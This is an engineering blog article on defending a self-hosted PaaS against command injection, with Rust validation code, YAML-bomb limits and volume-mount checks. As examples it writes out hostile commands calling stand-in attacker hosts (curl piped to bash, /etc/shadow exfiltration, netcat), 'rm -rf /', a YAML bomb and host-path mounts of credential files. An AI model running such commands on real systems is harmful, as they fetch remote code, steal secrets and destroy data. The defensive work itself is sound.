Preventing Command Injection in a PaaS

Here is the fundamental paradox of building a Platform-as-a-Service: the entire point of the product is to run user-provided commands. Deploy hooks execute npm run build. Cron jobs run python cleanup.py. Docker exec sessions pass shell commands to running containers. You cannot simply reject all user input that looks like a command -- commands are the product.

But a PaaS that runs arbitrary shell input is one semicolon away from catastrophe. npm run build; curl attacker.com/shell.sh | bash looks like a build command with a creative suffix. It is actually arbitrary code execution on your infrastructure.

This article covers how we built command injection prevention for sh0.dev: the validate_command() function, the three attack surfaces it protects, and the complementary defenses that make the system safe without making it unusable.

The Three Attack Surfaces

sh0 accepts user-provided commands in three places, each with different trust levels and execution contexts:

1. Cron Jobs

Users define scheduled tasks with a cron expression and a command string. The command runs inside the application's container on the defined schedule. This is the highest-risk surface because cron jobs run unattended -- there is no human watching the output, and a malicious command could execute for weeks before anyone notices.

2. Deploy Hooks

Pre-deploy and post-deploy hooks run as part of the deployment pipeline. A pre-deploy hook might run database migrations; a post-deploy hook might clear a cache or send a notification. These commands execute in the build or application container during the deploy process.

3. Docker Exec (Web Terminal)

The web terminal feature allows users to open a shell session inside a running container. This is inherently an arbitrary command execution interface -- that is its purpose. The defense here is different: authentication and authorization rather than command validation. But the Docker exec API itself needs protection against parameter injection.

Shell Metacharacter Injection

The core attack vector is shell metacharacter injection. When a command string is passed to sh -c, the shell interprets special characters before executing the command. These metacharacters enable command chaining, subshell execution, and I/O redirection:

Character	Effect
`;`	Command separator -- executes the next command regardless
`\	`	Pipe -- feeds output to the next command
`&`	Background execution or command chaining (`&&`)
` ``	Command substitution -- executes enclosed command
`$(`	Command substitution (modern syntax)
`>` / `<`	I/O redirection -- can overwrite files
`\n` / `\r`	Newline injection -- starts a new command

A cron job defined as python cleanup.py && curl attacker.com/exfil?data=$(cat /etc/shadow) uses three metacharacters: && for chaining, $( for command substitution, and the resulting command exfiltrates the shadow password file.

The validate_command() Function

Our defense is a strict validation function that rejects commands containing shell metacharacters. The function runs at the API boundary -- before the command is stored in the database, before it is queued for execution, before it touches any shell.

rustconst FORBIDDEN_CHARS: &[char] = &[';', '|', '&', '`', '>', '<', '\n', '\r'];
const FORBIDDEN_PATTERNS: &[&str] = &["$(", "${"];
const MAX_COMMAND_LENGTH: usize = 4096;

pub fn validate_command(cmd: &str) -> Result<(), ApiError> {
    // Length limit prevents abuse and buffer overflow in downstream systems
    if cmd.is_empty() {
        return Err(ApiError::BadRequest("Command cannot be empty".into()));
    }
    if cmd.len() > MAX_COMMAND_LENGTH {
        return Err(ApiError::BadRequest(
            format!("Command exceeds maximum length of {} characters", MAX_COMMAND_LENGTH)
        ));
    }

    // Reject shell metacharacters
    for ch in FORBIDDEN_CHARS {
        if cmd.contains(*ch) {
            return Err(ApiError::BadRequest(
                format!("Command contains forbidden character: '{}'", ch)
            ));
        }
    }

    // Reject shell expansion patterns
    for pattern in FORBIDDEN_PATTERNS {
        if cmd.contains(pattern) {
            return Err(ApiError::BadRequest(
                format!("Command contains forbidden pattern: '{}'", pattern)
            ));
        }
    }

    Ok(())
}

The 4096-character limit is not arbitrary. It matches the default ARG_MAX on most Linux systems for individual arguments and prevents denial-of-service through extremely long command strings that consume memory during validation and logging.

What This Allows

The validation is deliberately permissive for legitimate use cases:

python manage.py migrate -- no metacharacters, passes
npm run build -- no metacharacters, passes
/usr/bin/backup --output /data/backup.tar.gz -- flags and paths are fine
node scripts/cleanup.js --days 30 -- arguments with values pass
curl -X POST https://api.example.com/webhook -- URLs without metacharacters pass

What This Rejects

npm run build; rm -rf / -- semicolon rejected
echo "done" | nc attacker.com 4444 -- pipe rejected
python script.py && curl evil.com -- ampersand rejected
` echo whoami ` -- backtick rejected
python -c "import os; os.system('$(cat /etc/passwd)')" -- $( rejected
node app.js > /dev/null -- redirection rejected

The False Positive Question

The most common objection to metacharacter rejection is false positives. "What if my cron job legitimately needs a pipe?" The answer: write a script. Instead of cat log.txt | grep ERROR | wc -l, create a count_errors.sh file in your repository and set the cron command to bash /app/count_errors.sh. The script file can contain any shell syntax it wants -- the injection risk exists only at the command-string boundary where user input meets the shell.

This is not a limitation. It is a best practice. Shell one-liners in cron definitions are fragile, hard to test, and impossible to version control. Pushing complex logic into scripts improves maintainability regardless of security considerations.

Cron Jobs: Validation at Definition Time

Cron job commands are validated when the job is created or updated -- not when it executes. This is critical. If validation only happened at execution time, a malicious command would be stored in the database, visible in the UI, and potentially copied by other users before the validation kicks in.

rustpub async fn create_cron_job(
    auth: AuthUser,
    Path(app_id): Path<String>,
    Json(payload): Json<CreateCronJob>,
) -> Result<Json<Value>, ApiError> {
    require_app_access(&auth, &app_id, Role::Developer)?;

    // Validate command BEFORE storing
    validate_command(&payload.command)?;

    // Validate cron expression
    validate_cron_expression(&payload.schedule)?;

    // Enforce per-app limit
    let existing = db::cron_jobs::count_by_app(&app_id).await?;
    if existing >= 50 {
        return Err(ApiError::BadRequest("Maximum 50 cron jobs per app".into()));
    }

    // Safe to store and schedule
    let job = db::cron_jobs::create(&app_id, &payload).await?;
    Ok(Json(to_json(&job)?))
}

The per-app limit of 50 cron jobs is a secondary defense. Without it, an attacker could create thousands of cron jobs to exhaust scheduler resources -- a denial-of-service that does not require command injection.

Deploy Hooks: Validation Before Execution

Deploy hooks follow the same pattern but with an additional constraint: they execute in the context of the deployment pipeline, which has access to build artifacts, environment variables, and the Docker socket.

rustpub async fn execute_hooks(
    hooks: &[DeployHook],
    container_id: &str,
    phase: HookPhase,
) -> Result<(), DeployError> {
    for hook in hooks.iter().filter(|h| h.phase == phase) {
        // Re-validate even though it was validated at creation time
        // Defense in depth: the hook definition could have been modified
        validate_command(&hook.command)?;

        docker::exec(container_id, &["sh", "-c", &hook.command]).await?;
    }
    Ok(())
}

We validate at both creation time and execution time. The creation-time check prevents storage of malicious commands. The execution-time check is defense in depth -- if a database migration, a bug, or a direct database modification introduces a malicious command, the execution-time validation catches it.

YAML Bomb Protection

sh0 supports Docker Compose-style YAML configuration files for multi-container deployments. YAML parsing introduces its own class of injection attacks:

YAML bombs exploit YAML's anchor/alias feature to create exponential expansion:

yamla: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]

Each level multiplies by 9. Four levels produce 6,561 elements. Eight levels produce 43 billion. A 1 KB YAML file can consume gigabytes of memory during parsing.

The defense is simple: reject YAML files larger than 256 KB before parsing. Legitimate Docker Compose files rarely exceed a few kilobytes. The limit is generous enough for any real use case and prevents the exponential expansion from starting.

rustconst MAX_YAML_SIZE: usize = 256 * 1024; // 256 KB

pub fn parse_compose(yaml_str: &str) -> Result<ComposeConfig, ApiError> {
    if yaml_str.len() > MAX_YAML_SIZE {
        return Err(ApiError::BadRequest(
            format!("YAML file exceeds maximum size of {} bytes", MAX_YAML_SIZE)
        ));
    }
    serde_yaml::from_str(yaml_str).map_err(|e| ApiError::BadRequest(e.to_string()))
}

Volume Path Traversal Prevention

Docker Compose configurations can specify volume mounts. A malicious configuration could attempt to mount host paths:

yamlservices:
  app:
    volumes:
      - /etc/shadow:/stolen/shadow:ro
      - ../../../root/.ssh:/stolen/ssh:ro

sh0 rejects any volume mount that specifies a host path. Only named volumes and anonymous volumes are allowed:

rustpub fn validate_volumes(volumes: &[String]) -> Result<(), ApiError> {
    for volume in volumes {
        // Named volumes: "mydata:/app/data"
        // Anonymous volumes: "/app/data"
        // Host paths: "/host/path:/container/path" or "./relative:/container/path"
        let parts: Vec<&str> = volume.split(':').collect();
        if parts.len() >= 2 {
            let source = parts[0];
            // Reject absolute host paths and relative paths
            if source.starts_with('/') || source.starts_with('.') || source.contains("..") {
                return Err(ApiError::BadRequest(
                    format!("Host path mounts are not allowed: {}", volume)
                ));
            }
        }
    }
    Ok(())
}

This is a fundamental security boundary in any container orchestration platform. Host path mounts bypass container isolation entirely. The container filesystem should be the container's concern; the host filesystem belongs to the platform.

Container Security Defaults

Beyond command validation, every container started by sh0 receives security defaults that limit the blast radius of any command that does execute:

no-new-privileges: true -- Prevents processes inside the container from gaining additional privileges through setuid binaries or capability inheritance. Even if an attacker achieves code execution, they cannot escalate to root.
Memory limit: 512 MB -- Prevents a runaway process from consuming all host memory.
CPU limit: 1.0 CPU -- Prevents a compute-intensive attack from starving other containers.

These are applied to all containers by default. Users can adjust resource limits within defined bounds but cannot disable no-new-privileges.

The Defense-in-Depth Stack

No single defense is sufficient. Command injection prevention in sh0 is a stack of complementary measures:

Layer	Defense	Protects Against
1	`validate_command()`	Shell metacharacter injection
2	YAML size limit (256 KB)	YAML bombs / memory exhaustion
3	Volume mount rejection	Host filesystem access
4	`no-new-privileges`	Privilege escalation inside containers
5	Resource limits	DoS via resource consumption
6	RBAC enforcement	Unauthorized access to create cron/hooks
7	Audit logging	Post-incident forensics
8	Rate limiting	Brute-force command creation

An attacker would need to bypass multiple layers simultaneously. Even if validate_command() missed a novel injection technique, the container runs with restricted privileges, limited resources, no host filesystem access, and full audit logging.

Balancing Security with Usability

The hardest part of command injection prevention is not the implementation -- it is the user experience. Every rejected command is a frustrated user. The error messages must be specific enough that the user understands what to change:

400 Bad Request: Command contains forbidden character: '|'

is actionable. The user knows to remove the pipe and use a script instead.

400 Bad Request: Invalid command

is useless. The user has no idea what is wrong.

We also document the restriction in the dashboard UI. The cron job creation form and deploy hook configuration page both include a note explaining that shell metacharacters are not allowed and suggesting the script-file alternative for complex commands.

What We Considered and Rejected

Shell escaping instead of rejection. We could escape metacharacters instead of rejecting them -- turning ; into \;, | into \|, etc. We rejected this approach because escaping is fragile. Different shells handle escaping differently. Nested escaping (escaping an already-escaped string) is notoriously error-prone. A missed edge case in the escaping logic is a command injection vulnerability. Rejection is blunt but reliable.

Sandboxed shell execution. We could run commands in a restricted shell (rbash) or use seccomp profiles to limit system calls. This adds complexity and is shell-specific. We already run commands inside Docker containers with no-new-privileges -- the container itself is the sandbox.

AST-based command parsing. We could parse the command string into an abstract syntax tree and reject trees that contain multiple commands, redirections, or subshells. This is theoretically more precise but requires a full shell parser. Shell grammar is complex, inconsistent across implementations, and a parsed AST gives a false sense of security if the parsing does not exactly match the shell's behavior.

The simplest solution -- reject known-dangerous characters at the string level -- is the most robust. It has no edge cases because it does not try to understand the command's semantics. It just rejects characters that have special meaning to any POSIX shell.

Lessons Learned

Validate at the boundary, not at execution. Command validation happens when the user creates the cron job or deploy hook -- before the command touches the database. Execution-time validation is defense in depth, not the primary control.

Rejection beats escaping. Escaping shell metacharacters is fragile and shell-specific. Rejecting them is blunt, reliable, and easy to reason about.

The script-file pattern solves the usability problem. If users need complex shell logic, they should write a script file and set the command to execute it. This is better engineering practice regardless of security.

Defense in depth is not optional. No single layer is sufficient. Command validation, container isolation, resource limits, privilege restrictions, RBAC, and audit logging work together. An attacker must bypass all of them.

Error messages are a security UX feature. Specific error messages ("forbidden character: '|'") turn a frustrating rejection into a learning moment. Generic messages ("invalid command") generate support tickets.

This article is part of the "How We Built sh0.dev" series. sh0 is a self-hosted PaaS built in Rust by Juste Thales Gnimavo and Claude in 14 days with zero human engineers. Follow the series for deep dives into every layer of the platform.